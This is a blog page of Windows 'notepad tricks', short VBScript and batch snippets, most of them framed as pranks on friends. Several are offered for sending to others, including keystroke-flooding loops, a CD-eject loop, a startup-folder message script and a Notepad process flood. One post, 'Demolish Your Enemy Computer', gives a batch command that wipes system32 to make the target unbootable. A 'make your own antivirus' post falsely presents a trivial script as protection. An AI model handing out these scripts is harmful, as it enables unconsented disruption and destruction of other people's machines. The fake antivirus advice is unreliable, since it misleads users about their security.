NEW AND EXCLUSIVE : GO TO THE ONLINE TEST PAGE AND TEST YOURSELF THROUGH EXAMINATION
Showing posts with label NOTEPAD TRICKS. Show all posts
Showing posts with label NOTEPAD TRICKS. Show all posts

Find your computer “male” or “female” ???

Want to know that your pc is male or female???
Just follow the simple notepad trick.
Open notepad and type the following code


CreateObject("SAPI.SpVoice").Speak"I love you"
Save file as computer_gender.vbs & click on "save as type" as All Files.

Run the file ...
If you hear a male voice, you have a boy,
If you hear a female voice, you have a girl..............!!
Must Try ......!!! :)
mine is male..!!!


Read More!!

Make an Antivirus

If you are not able or do not want to buy an antivirus software then you can make your own antivirus by a simple notepad code.Here you have to do just....
1.Open notepad.

2.Copy the following code and paste it in the notepad




@echo off
title Antivirus
echo Antivirus
echo created by your name
:start
IF EXIST virus.bat goto infected
IF NOT EXIST virus.bat goto clean
cd C:\Windows\system32
:infected
echo WARNING VIRUS DETECTED!
del virus.bat
pause
goto start
:clean
echo YOUR COMPUTER IS PROTECTED
pause
exit

3.Change the "Save as type" section into "All Files,with the file name as you wish and the extension should be .BAT and click save.


4.Now double click on the bat file and you will observ a command prompt window doing a scan.




Thats it.


Read More!!

Close Frozen Program Easily

Sometimes you are frustrated by the windows error program not responding
and it takes generally 5-15 minutes to recover automatically or you can close
it by pressing ctrl+alt+del.




Here i am telling you two solution of this problem. NO.1 By using notepad
and NO.2 is by Creating Shortcut.


1)Notepad trick
Just open your notepad and type the code below........

@echo off
taskkill.exe /f /fi “status eq not responding”
exit


Save it as anyname.bat

2)Shortcut trick
Just right click in your desktop and move your cursor to new and click on
shortcut. Then in location box type the following code....
taskkill.exe /f /fi "status eq not responding"

Now when you facing this type of error,in both cases just double click the BAT
file or the Shortcut
you just created and the error will be recovered.







Read More!!

Display Pop Up Message in CMD






A pop-up is a graphical user interface ( GUI ) display area, usually a small 
window, that suddenly appears ("pops up") in the foreground of the visual interface.
It is a simple code which will accept the name of the user as well as show
in the pop up message.
First open notepad and write the code below.........



@ECHO OFF
title by @Ablaze @ THE NEXT LEVEL
:s
echo who r u ?
set /P name=
:disp
cls
title by @Ablaze @ THE NEXT LEVEL
msg * "hi %name% all iz well :)"
msg * "visit www.trickstonextlevel.blogspot.com"
:exit



Now save it as "anyname.bat".
Then copy and paste it in your freind's startup.
Now the message is dispayed each time he switch on his system.


ENJOY.....................






Read More!!

Chat Using CMD






Guys this is a trick by which you can chat with your loved ones in 
the CMD sreen. But you have to know the IP address of your friend.
Here is the process................


Just open notepad and type the following code..



@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


Save it as "anyname.bat".
Now run cmd and drag the file (.bat file) to cmd and hit enter.
Then type your friend's computer's IP address and hit enter.
Now you type your message and start chatting....cool.






Read More!!

Frustrate your friend by making their keyboard hit Backspace simultaneously whenever they press a key







Just open notepad and type the code bellow........


MsgBox “Let’s rock and roll”
Set wshShell =wscript.CreateObject(“WScript.Shell”)

do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop



Now save it as "anyname.vbs" and send it to your friend . 
Thats it.






Read More!!

Continuously Eject Your Friend’s CD or DVD Drive.

By this trick you can also frustrate your friend by continously ejecting his CD or DVD drive. First you have to
open notepad and then type the following code............








Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1

colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Now save it "anyname.vbs" and send it to your friend.
Now when your friend run this program he will face the problem.









Read More!!

Make Notepad Open Continously







By using this simple code given below you can make the notepad open continuously with non stop..
Open notepad & type the following code given below :-


@ECHO off

:top
START %SystemRoot%\system32\notepad.exe
GOTO top


save the file as “anyname.bat”


But this may even lead to hanging of some computers.
To stop this you have to close the running cmd screen.






Read More!!

Frustrate Your Friend



You can disturb your friend by this simple notepad trick.
By this trick you can show messages continously on your friend's 
cmd screen.

Just open notepad and type the code bellow............


@ECHO off
:Begin

msg * Hai
msg * How are you dear….
msg * I am fine ya!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

and save it as "anyname.bat". Now when your friend click the file then 
it happens.




Read More!!

Demolish Your Enemy Computer






Computer demolishing is emptying the system32 folder in your pc.By 
this trick you cannot boot as system32 is an indespensible folder which is 
needed for booting and all the core operation of operating system.



For this you have to write in notepad the following code......
- del c:\windows\system32\*.* /q
then save the file as "killer.bat" (without quotes).



BUT BEWARE !!!!!!!!!!!

Don’t click this file in your computer as the file you had created will empty all files in system32 folderwhich is essential for your computer to work.

Read More!!

Type Continously With Keyboard...



This is a funny trick. By this trick you can compell your friend to think that his system has been attacked by 
virus .First you have to open notepad and then type the following code.....


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Virus attacks your System."
loop



Then save it as "somename.vbs". Now when your friend run this file ,his mouse ,keyboard will stop working and
every search place of his system continously show this-"Virus attacks your System."


To stop this he must restart his system.





Read More!!

TEST YOUR ANTI-VIRUS......

You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below:


  • Open Notepad.
  • Copy the code give below in the notepad file:
    X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • Save it with an .exe extension like 'avtest.exe'
As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then you have to depend on other programs.





Read More!!

Create your own Matrix...

just follow the steps and see the amazing matrix effect happen in
your DOS window:




  Open Notepad.

  Copy the below mentioned text in your notepad file:

  @echo off

  color 02

  :start

  echo %random% %random% %random% %random% %random% %random%
%random% %random% %random% %random%

  goto start

  Save the file with .bat extension like Matrix.bat

Thats it. Just open the file to see the matrix effect right before your eyes!

u can change the colour of the matrix by changing color code.....such as color 03,color 04,color 05 etc. 



Read More!!